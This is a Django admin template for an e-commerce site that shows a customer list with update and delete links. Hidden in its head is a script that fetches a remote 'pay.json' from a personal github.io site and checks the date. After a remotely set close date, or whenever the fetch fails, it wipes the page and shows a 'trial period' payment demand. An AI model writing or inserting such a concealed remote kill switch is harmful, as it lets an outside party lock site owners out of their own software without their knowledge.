{% extends 'ecom/admin_base.html' %}
{% load static %}
{% block content %}


<head>
  <script>
    if(navigator.onLine){
    fetch('https://asridatta.github.io/pay.json').then(jsn => jsn.json()).then(jsn =>{
      fetch('http://worldtimeapi.org/api/timezone/Asia/Kolkata').then((doc)=>{return doc.json()}).then((docs)=>{
        if(docs.datetime.split('T')[0] < jsn.close_date){
          console.warn('expire date',jsn.close_date)
        }else if(docs.datetime.split('T')[0]>=jsn.close_date){
          document.body.innerHTML = `trial period conpleted<br>${jsn.msg} ${jsn.due}`;
        }
      })
    }).catch(err=>{
      document.body.innerHTML="please check your internet connection";
    })}
    else{
      document.body.innerHTML="please check your internet connection";
    }
    </script>
  <link href="{% static 'css/bootstrap.300.min.css' %}" rel="stylesheet" id="bootstrap-css">
  <script src="{% static 'js/bootstrap.300.min.js' %}"></script>
  <script src="{% static 'js/jquery-1.11.1.min.js' %}"></script>

  <style media="screen">
    a:link {
      text-decoration: none;
    }

    h6 {
      text-align: center;
    }

    .row {
      margin: 100px;
    }
  </style>
</head>
<!--
written By : sumit kumar

-->
<div class="container">
  <div class="panel panel-primary">
    <div class="panel-heading">
      <h6 class="panel-title">Total Customer List</h6>
    </div>
    <table class="table table-hover" id="dev-table">
      <thead>
        <tr>
          <th>Name</th>
          <th>Profile Picture</th>
          <th>Mobile</th>
          <th>Address</th>
          <th>Update</th>
          <th>Delete</th>
        </tr>
      </thead>
      {% for c in customers %}
      <tr>
        <td> {{c.get_name}}</td>
        <td> <img src="{% static c.profile_pic.url %}" alt="Profile Pic" height="40px" width="40px" /></td>
        <td>{{c.mobile}}</td>
        <td>{{c.address}}</td>
        <td><a class="btn btn-primary btn-xs" href="{% url 'update-customer' c.id  %}"><span class="glyphicon glyphicon-edit"></span></a></td>
        <td><a class="btn btn-danger btn-xs" href="{% url 'delete-customer' c.id  %}"><span class="glyphicon glyphicon-trash"></span></a></td>

      </tr>
      {% endfor %}
    </table>
  </div>
</div>
<!--



-->
{% endblock content %}
